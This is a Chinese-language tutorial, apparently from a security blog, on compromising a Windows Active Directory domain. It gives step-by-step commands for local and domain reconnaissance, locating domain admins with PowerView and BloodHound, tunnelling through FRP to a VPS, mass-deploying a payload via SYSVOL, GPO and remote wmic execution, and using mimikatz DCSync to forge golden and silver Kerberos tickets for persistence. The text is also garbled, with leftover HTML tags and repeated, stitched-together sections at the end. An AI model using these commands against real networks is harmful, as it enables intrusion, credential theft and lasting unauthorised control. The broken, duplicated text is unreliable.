域渗透流程详解<\/h1>

0x0 前言<\/h2>
本文详细记录了一个完整的域渗透流程，从初始权限获取到最终域控制，涵盖了信息收集、域环境侦查、横向移动和权限维持等关键环节。<\/p>

0x1 初始环境<\/h2>
假设已通过某种手段获得了一个机器的system控制权限，主机名为pohxxadc，域名为pohxx.com，IP为192.168.1.36。<\/p>

0x2 初步信息收集<\/h2>

0X2.1 单机手工收集<\/h3>

网络配置信息<\/strong><\/p>

ipconfig \/all
<\/span><\/span><\/code><\/pre>关键信息：主机名、DNS域名、IP地址、子网掩码、默认网关、DNS服务器。<\/p>
<\/li>

操作系统信息<\/strong><\/p>
systeminfo | findstr \/b \/c:"OS Name"<\/span> \/c:"OS Version"<\/span>
<\/span><\/span><\/code><\/pre>示例输出：<\/p>
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N\/A Build 9600
<\/code><\/pre>
<\/li>

处理器架构<\/strong><\/p>
echo<\/span> %processor_architecture%
<\/span><\/span><\/code><\/pre><\/li>

安装软件列表<\/strong><\/p>
wmic product get name,version
<\/span><\/span><\/code><\/pre>特别注意VNC、数据库等敏感软件。<\/p>
<\/li>

服务信息<\/strong><\/p>
wmic service list brief
<\/span><\/span><\/code><\/pre>关注Running和Auto状态的服务。<\/p>
<\/li>

进程列表<\/strong><\/p>
tasklist \/svc
<\/span><\/span>wmic process list brief
<\/span><\/span><\/code><\/pre><\/li>

启动程序<\/strong><\/p>
wmic startup get command, caption
<\/span><\/span><\/code><\/pre><\/li>

计划任务<\/strong><\/p>
schtasks \/query \/fo list \/v
<\/span><\/span><\/code><\/pre><\/li>

用户列表<\/strong><\/p>
net user
<\/span><\/span>net localgroup administrators
<\/span><\/span><\/code><\/pre><\/li>

网络连接<\/strong><\/p>
netstat -ano
<\/span><\/span><\/code><\/pre>重点关注53(DNS)、3389(RDP)等端口。<\/p>
<\/li>

补丁信息<\/strong><\/p>
systeminfo
<\/span><\/span>wmic qfe get Caption,Description,HotFixID,InstalledOn
<\/span><\/span><\/code><\/pre><\/li>

共享列表<\/strong><\/p>
net share
<\/span><\/span>wmic share get name,path,status
<\/span><\/span><\/code><\/pre><\/li>

路由和ARP<\/strong><\/p>
route print
<\/span><\/span>arp -a
<\/span><\/span><\/code><\/pre><\/li>

防火墙配置<\/strong><\/p>
<\/code><\/pre><\/li>
<\/ol>
netsh advfirewall show allprofiles<\/p>

### 0x2.2 单机自动化收集

可以使用工具如Ladon进行自动化收集，但需注意：
- 可能触发报警
- 操作不可控
- 耗时较长
- 信息准确性不确定

## 0x3 侦查域环境

### 0x3.1 判断是否存在域环境

1. **ipconfig命令**
```cmd
ipconfig \/all
<\/code><\/pre>
查看DNS后缀是否为域名。<\/p>


systeminfo<\/strong><\/p>
systeminfo
<\/span><\/span><\/code><\/pre>查看"Domain"字段。<\/p>
<\/li>

net config<\/strong><\/p>
net config workstation
<\/span><\/span><\/code><\/pre>查看"Workstation domain"和"Logon domain"。<\/p>
<\/li>

net time<\/strong><\/p>
net time \/domain
<\/span><\/span><\/code><\/pre>若存在域但无权限会返回"Access is denied"。<\/p>
<\/li>
<\/ol>
0x3.2 收集域内基础信息<\/h3>


查询所有域<\/strong><\/p>
net view \/domain
<\/span><\/span><\/code><\/pre><\/li>

查询域内计算机<\/strong><\/p>
net view \/domain:域名
<\/span><\/span><\/code><\/pre><\/li>

查询域内用户组<\/strong><\/p>
net group \/domain
<\/span><\/span><\/code><\/pre>重点关注：<\/p>

Domain Admins(域管理员)<\/li>
Domain Computers(域内机器)<\/li>
Domain Controllers(域控制器)<\/li>
Enterprise Admins(企业系统管理员)<\/li>
<\/ul>
<\/li>

查询域密码策略<\/strong><\/p>
net account \/domain
<\/span><\/span><\/code><\/pre><\/li>

查询域信任关系<\/strong><\/p>
nltest \/domain_trusts
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x3.3 查看域控制器<\/h3>


查询域控制器列表<\/strong><\/p>
nltest \/dclist:域名
<\/span><\/span><\/code><\/pre><\/li>

查询域控制器主机名<\/strong><\/p>
nslookup -type=SRV _ldap._tcp
<\/span><\/span><\/code><\/pre><\/li>

查询域控制器组<\/strong><\/p>
net group "Domain Controllers"<\/span> \/domain
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x3.4 获取域内用户和管理员信息<\/h3>


查询所有域用户<\/strong><\/p>
net user \/domain
<\/span><\/span><\/code><\/pre><\/li>

查询域管理员<\/strong><\/p>
net group "Domain admins"<\/span> \/domain
<\/span><\/span><\/code><\/pre><\/li>

查询企业管理员<\/strong><\/p>
net group "Enterprise Admins"<\/span> \/domain
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x3.5 定位域管理员<\/h3>
使用PowerView定位域管理员登录的机器：<\/p>


导入PowerView<\/strong><\/p>
powershell-import PowerView.ps1
<\/span><\/span><\/code><\/pre><\/li>

查询域管理员会话<\/strong><\/p>
Invoke-UserHunter
<\/span><\/span><\/code><\/pre><\/li>

常用PowerView命令<\/strong><\/p>
Get-NetDomain          # 获取当前域<\/span>
<\/span><\/span>Get-NetUser            # 获取所有用户<\/span>
<\/span><\/span>Get-NetDomainController # 获取域控制器<\/span>
<\/span><\/span>Get-NetComputer        # 获取域内机器<\/span>
<\/span><\/span>Get-NetSession         # 获取会话<\/span>
<\/span><\/span>Get-NetLoggedon        # 获取已登录用户<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x3.6 查找域管理进程<\/h3>


本机检查<\/strong><\/p>
tasklist \/svc
<\/span><\/span><\/code><\/pre>对比域管理员列表。<\/p>
<\/li>

枚举本地管理员权限<\/strong><\/p>
Get-DomainComputer | Test-AdminAccess
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x3.7 BloodHound自动化收集域信息<\/h3>


收集数据<\/strong><\/p>
SharpHound.exe -all
<\/span><\/span><\/code><\/pre><\/li>

分析数据<\/strong><\/p>

使用Neo4j加载收集的数据<\/li>
重点关注"Find Shortest Paths to Domain Admins"<\/li>
<\/ul>
<\/li>
<\/ol>
0x4 域环境横向目标<\/h2>
0x4.1 搭建加密隧道<\/h3>
使用FRP搭建socks5代理：<\/p>


服务端配置(frps.ini)<\/strong><\/p>
[common]<\/span>
<\/span><\/span>bind_port<\/span> =<\/span> 14500<\/span>
<\/span><\/span>token<\/span> =<\/span> your_token<\/span>
<\/span><\/span><\/code><\/pre><\/li>

客户端配置(frpc.ini)<\/strong><\/p>
[common]<\/span>
<\/span><\/span>server_addr<\/span> =<\/span> VPS_IP<\/span>
<\/span><\/span>server_port<\/span> =<\/span> 14500<\/span>
<\/span><\/span>token<\/span> =<\/span> your_token<\/span>
<\/span><\/span>tls_enable<\/span> =<\/span> true<\/span>
<\/span><\/span>
<\/span><\/span>[http_proxy]<\/span>
<\/span><\/span>type<\/span> =<\/span> tcp<\/span>
<\/span><\/span>remote_port<\/span> =<\/span> 16005<\/span>
<\/span><\/span>plugin<\/span> =<\/span> socks5<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x4.2 寻找靶标<\/h3>


端口扫描<\/strong><\/p>
portscan 192.168.1.0\/24 80,443,8080
<\/span><\/span><\/code><\/pre><\/li>

Web服务探测<\/strong>

使用httpx等工具扫描开放的Web服务。<\/p>
<\/li>
<\/ol>
0x4.3 批量上线<\/h3>


通过GPO下发<\/strong>

针对指定OU的机器和用户执行命令。<\/p>
<\/li>

通过域共享<\/strong>

上传payload到SYSVOL目录：<\/p>
\\域控制器\sysvol\域名\payload.exe
<\/span><\/span><\/code><\/pre><\/li>

批量执行<\/strong><\/p>
wmic \/node:IP process call create "cmd \/c \\路径\payload.exe"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x5 域环境权限维持<\/h2>
0x5.1 黄金票据(Golden Ticket)<\/h3>


获取krbtgt的NTLM Hash<\/strong><\/p>
lsadump::dcsync \/domain:域名 \/user:krbtgt
<\/code><\/pre>
<\/li>

获取域SID<\/strong><\/p>
wmic useraccount get name,sid
<\/span><\/span><\/code><\/pre><\/li>

生成黄金票据<\/strong><\/p>
kerberos::golden \/admin:用户名 \/domain:域名 \/sid:域SID \/krbtgt:hash值 \/ticket:票据文件名
<\/code><\/pre>
<\/li>

注入票据<\/strong><\/p>
kerberos::ptt 票据文件名
<\/code><\/pre>
<\/li>
<\/ol>
0x5.2 白银票据(Silver Ticket)<\/h3>


获取服务账号Hash<\/strong><\/p>
lsadump::dcsync \/domain:域名 \/user:机器名$
<\/code><\/pre>
<\/li>

生成白银票据<\/strong><\/p>
kerberos::golden \/domain:域名 \/sid:域SID \/target:目标FQDN \/service:服务类型 \/rc4:服务账号Hash \/user:用户名 \/ptt
<\/code><\/pre>
<\/li>
<\/ol>
0x6 总结<\/h2>
本文详细记录了从初始权限获取到最终控制域环境的完整流程，包括信息收集、域环境侦查、横向移动和权限维持等关键步骤。掌握这些技术可以帮助安全人员更好地理解域环境的安全风险。<\/p>

域渗透流程详解<\/h1>

0x0 前言<\/h2> 本文详细记录了一个完整的域渗透流程，从初始权限获取到最终域控制，涵盖了信息收集、域环境侦查、横向移动和权限维持等关键环节。<\/p>

0x1 初始环境<\/h2> 假设已通过某种手段获得了一个机器的system控制权限，主机名为pohxxadc，域名为pohxx.com，IP为192.168.1.36。<\/p>

0x2 初步信息收集<\/h2>

0x4 域环境横向目标<\/h2>

0x5 域环境权限维持<\/h2>

0x6 总结<\/h2> 本文详细记录了从初始权限获取到最终控制域环境的完整流程，包括信息收集、域环境侦查、横向移动和权限维持等关键步骤。掌握这些技术可以帮助安全人员更好地理解域环境的安全风险。<\/p>

0x0 前言<\/h2>
本文详细记录了一个完整的域渗透流程，从初始权限获取到最终域控制，涵盖了信息收集、域环境侦查、横向移动和权限维持等关键环节。<\/p>

0x1 初始环境<\/h2>
假设已通过某种手段获得了一个机器的system控制权限，主机名为pohxxadc，域名为pohxx.com，IP为192.168.1.36。<\/p>

0x6 总结<\/h2>
本文详细记录了从初始权限获取到最终控制域环境的完整流程，包括信息收集、域环境侦查、横向移动和权限维持等关键步骤。掌握这些技术可以帮助安全人员更好地理解域环境的安全风险。<\/p>